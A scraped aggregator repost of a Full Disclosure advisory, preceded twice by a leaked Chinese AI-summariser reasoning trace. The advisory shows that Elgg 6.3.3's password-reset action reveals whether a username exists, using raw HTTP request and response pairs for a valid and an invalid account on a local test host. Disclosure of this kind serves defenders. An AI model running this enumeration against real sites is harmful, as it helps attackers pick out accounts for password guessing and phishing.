Username Enumeration - elggv6.3.3
嗯,用户发来了一个请求,让我帮他总结一篇文章的内容,控制在100个字以内。而且不需要用“文章内容总结”或者“这篇文章”这样的开头,直接写描述就行。看起来他可能是一个安全研究人员或者学生,需要快速了解某个漏洞的情况。 首先,我需要仔细阅读用户提供的文章内容。这篇文章是关于Elgg平台的一个漏洞,标题是“Username Enumeration”,也就是用户名枚举。作者是Andrey Stoykov,版本是6.3.3,测试环境是Ubuntu 22.04。 文章里详细描述了通过重置密码功能来枚举用户名的过程。当输入有效的用户名时,系统会发送重置邮件并跳转到主页;而无效的用户名则会显示错误信息并跳转回忘记密码页面。这说明Elgg平台在处理密码重置请求时没有正确隐藏用户是否存在的情况,导致攻击者可以通过观察响应来判断用户名是否有效。 接下来,我需要将这些信息浓缩到100字以内。重点包括:漏洞名称、影响版本、攻击方式、成功和失败的响应差异。这样用户就能快速了解漏洞的基本情况和潜在风险。 最后,确保语言简洁明了,不使用复杂的术语,让不同背景的读者都能理解。 </think> Elgg 6.3.3 存在用户名枚举漏洞,攻击者可通过重置密码功能判断用户名是否存在。有效用户返回成功提示并重定向至主页,无效用户则显示错误信息并重定向至忘记密码页面。 2026-1-29 21:31:20 Author: seclists.org(查看原文) 阅读量:0 收藏
嗯,用户发来了一个请求,让我帮他总结一篇文章的内容,控制在100个字以内。而且不需要用“文章内容总结”或者“这篇文章”这样的开头,直接写描述就行。看起来他可能是一个安全研究人员或者学生,需要快速了解某个漏洞的情况。 首先,我需要仔细阅读用户提供的文章内容。这篇文章是关于Elgg平台的一个漏洞,标题是“Username Enumeration”,也就是用户名枚举。作者是Andrey Stoykov,版本是6.3.3,测试环境是Ubuntu 22.04。 文章里详细描述了通过重置密码功能来枚举用户名的过程。当输入有效的用户名时,系统会发送重置邮件并跳转到主页;而无效的用户名则会显示错误信息并跳转回忘记密码页面。这说明Elgg平台在处理密码重置请求时没有正确隐藏用户是否存在的情况,导致攻击者可以通过观察响应来判断用户名是否有效。 接下来,我需要将这些信息浓缩到100字以内。重点包括:漏洞名称、影响版本、攻击方式、成功和失败的响应差异。这样用户就能快速了解漏洞的基本情况和潜在风险。 最后,确保语言简洁明了,不使用复杂的术语,让不同背景的读者都能理解。 </think> Elgg 6.3.3 存在用户名枚举漏洞,攻击者可通过重置密码功能判断用户名是否存在。有效用户返回成功提示并重定向至主页,无效用户则显示错误信息并重定向至忘记密码页面。 2026-1-29 21:31:20 Author: seclists.org(查看原文) 阅读量:0 收藏
Full Disclosure mailing list archives
From: Andrey Stoykov <mwebsec () gmail com>
Date: Sat, 24 Jan 2026 18:04:50 +0000
# Exploit Title: Elgg - Username Enumeration # Date: 1/2026 # Exploit Author: Andrey Stoykov # Version: 6.3.3 # Tested on: Ubuntu 22.04 # Blog: https://msecureltd.blogspot.com/2026/01/friday-fun-pentest-series-47-lack-of.html // HTTP Request - Resetting Password - Valid User POST /action/user/requestnewpassword HTTP/1.1 Host: elgg.local User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://elgg.local Sec-GPC: 1 Connection: keep-alive Referer: http://elgg.local/forgotpassword Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6 Upgrade-Insecure-Requests: 1 Priority: u=0, i __elgg_token=2Cpt0GyVW9swhLkm5PggkQ&__elgg_ts=1769264047&username=admin // HTTP Response - Resetting Password - Valid User HTTP/1.1 302 Found Date: Sat, 24 Jan 2026 14:14:43 GMT Server: Apache/2.4.52 (Ubuntu) Cache-Control: must-revalidate, no-cache, no-store, private expires: Thu, 19 Nov 1981 08:52:00 GMT pragma: no-cache Location: http://elgg.local/ Vary: User-Agent Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 318 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://elgg.local/'"; /> <title>Redirecting to http://elgg.local/</title> </head> <body> Redirecting to <a href="http://elgg.local/";>http://elgg.local/</a>. </body> </html> // HTTP Request - Following Redirection - Valid User GET / HTTP/1.1 Host: elgg.local User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://elgg.local Sec-GPC: 1 Connection: keep-alive Referer: http://elgg.local/action/user/requestnewpassword Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6 Upgrade-Insecure-Requests: 1 Priority: u=0, i // HTTP Response - Following Redirection - Valid User HTTP/1.1 200 OK Date: Sat, 24 Jan 2026 14:14:46 GMT Server: Apache/2.4.52 (Ubuntu) Cache-Control: must-revalidate, no-cache, no-store, private x-frame-options: SAMEORIGIN expires: Thu, 19 Nov 1981 08:52:00 GMT pragma: no-cache x-content-type-options: nosniff Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 20646 [...] <div class="elgg-message elgg-message-success"><div class="elgg-inner"><div class="elgg-body">Successfully requested a new password, email sent</div></div></div> [...] // HTTP Request - Resetting Password - Invalid User POST /action/user/requestnewpassword HTTP/1.1 Host: elgg.local User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 67 Origin: http://elgg.local Sec-GPC: 1 Connection: keep-alive Referer: http://elgg.local/forgotpassword Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6 Upgrade-Insecure-Requests: 1 Priority: u=0, i __elgg_token=2Cpt0GyVW9swhLkm5PggkQ&__elgg_ts=1769264047&username=x // HTTP Response - Resetting Password - Invalid User HTTP/1.1 302 Found Date: Sat, 24 Jan 2026 14:15:07 GMT Server: Apache/2.4.52 (Ubuntu) Cache-Control: must-revalidate, no-cache, no-store, private expires: Thu, 19 Nov 1981 08:52:00 GMT pragma: no-cache Location: http://elgg.local/forgotpassword Vary: User-Agent Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 374 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url=' http://elgg.local/forgotpassword'"; /> <title>Redirecting to http://elgg.local/forgotpassword</title> </head> <body> Redirecting to <a href="http://elgg.local/forgotpassword";> http://elgg.local/forgotpassword</a>. </body> </html> // HTTP Request - Following Redirection - Invalid User GET /forgotpassword HTTP/1.1 Host: elgg.local User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://elgg.local Sec-GPC: 1 Connection: keep-alive Referer: http://elgg.local/action/user/requestnewpassword Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6 Upgrade-Insecure-Requests: 1 Priority: u=0, i // HTTP Response - Following Redirection - Invalid User HTTP/1.1 200 OK Date: Sat, 24 Jan 2026 14:15:09 GMT Server: Apache/2.4.52 (Ubuntu) Cache-Control: must-revalidate, no-cache, no-store, private x-frame-options: SAMEORIGIN expires: Thu, 19 Nov 1981 08:52:00 GMT pragma: no-cache x-content-type-options: nosniff Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 19681 [...] <div class="elgg-message elgg-message-error"><div class="elgg-inner"><div class="elgg-body">Username x not found.</div></div></div> [...] _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- Username Enumeration - elggv6.3.3 Andrey Stoykov (Jan 29)
文章来源: https://seclists.org/fulldisclosure/2026/Jan/30
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh